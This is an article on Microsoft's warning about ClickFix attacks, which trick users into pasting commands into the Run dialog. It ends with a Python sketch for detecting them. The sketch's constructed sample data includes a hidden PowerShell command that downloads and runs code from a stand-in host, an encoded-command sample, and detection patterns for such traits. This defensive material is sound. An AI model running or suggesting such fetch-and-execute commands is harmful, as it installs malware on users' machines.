Microsoft recently issued a warning about the rise of a social engineering attack called ClickFix. Traditional anti-phishing methods are not enough to protect against this new style of attack. The ClickFix social engineering strategy has been gaining popularity among cybercriminals.
According to Microsoft, it was seen in 47% of initial access method attacks. The main defense is for users to change their behavior, because traditional phishing protection methods do not work against this attack.
What is ClickFix?
ClickFix is a social engineering method that takes advantage of the human inclination to solve problems. It displays fake error messages, prompting users to copy and paste code or launch commands to fix a supposedly minor technical issue on their system.
According to Microsoft, ClickFix tricks users into copying a command (sometimes embedded in a fake pop-up, job application, or support message) and pasting it into the Windows Run dialog (Win + R) or Terminal.
Severity of the attack
It is a 'clean, fileless process', which is often invisible to traditional security tools. According to Microsoft, ClickFix was the most common initial access method recorded through Microsoft Defender Expert Alerts last year, accounting for 47% of all attacks.
ClickFix techniques are being used by both cybercriminals and nation-state-level threat actors. Successful attacks have included payloads such as Lumma Stealer, XWorm, AsyncRAT, VenomRAT, Danabot, and NetSupport RAT. They have reportedly resulted in credential theft, malware staging, and persistent access, all from a few keystrokes by the user.
Security and Prevention
Microsoft also recommends implementing PowerShell logging to track potential ClickFix scams, monitoring clipboard-to-terminal activities, and using browser hardening and contextual detection systems to catch suspicious activity before the attack is successful.
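A command pasted into the Run dialog shows up in process-creation logging as a script interpreter started by explorer.exe, which gives defenders something to triage. The Python sketch below is an added example, not Microsoft's detection logic or code from the original article; the record fields, trait patterns, weights and threshold are assumptions, and the sample events are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Interpreters a pasted Run-dialog command is usually handed to (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Heuristic command-line traits with weights (assumptions; tune to your estate).
TRAITS = [
    ("hidden_window", 2, re.compile(r"(?i)\s-w\w*\s+(?:h\w*|1)\b")),
    ("encoded_command", 2, re.compile(r"(?i)\s-e(?:c|nc\w*)?\s+[a-z0-9+/=]{16,}")),
    ("remote_url", 2, re.compile(r"(?i)https?://")),
    ("inline_execution", 1, re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
]

def score_event(event):
    """Return (score, matched trait names) for one process-creation record."""
    parent = basename(event["parent_image"]).lower()
    child = basename(event["image"]).lower()
    # Win+R launches are children of explorer.exe; other parents are out of scope here.
    if parent != "explorer.exe" or child not in INTERPRETERS:
        return 0, []
    hits = [(n, w) for n, w, rx in TRAITS if rx.search(event["command_line"])]
    return sum(w for _, w in hits), [n for n, _ in hits]

def triage(events, threshold=2):
    """Return ids of events whose score reaches the threshold."""
    return [e["id"] for e in events if score_event(e)[0] >= threshold]

# Constructed sample records (simplified process-creation fields, not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix)"'},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /k ipconfig /all"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell -NoProfile -ep bypass -enc QQBCAEMARABFAEYARwBIAA=="},
    {"id": 4, "parent_image": r"C:\Tools\deploy-agent.exe", "image": PS,
     "command_line": "powershell -w hidden -File C:\\Tools\\patch.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], *score_event(ev))
```

Explorer.exe is also the parent of programs started from shortcuts and the Start menu, so the parent check narrows the candidate set but does not prove a Run-dialog paste on its own.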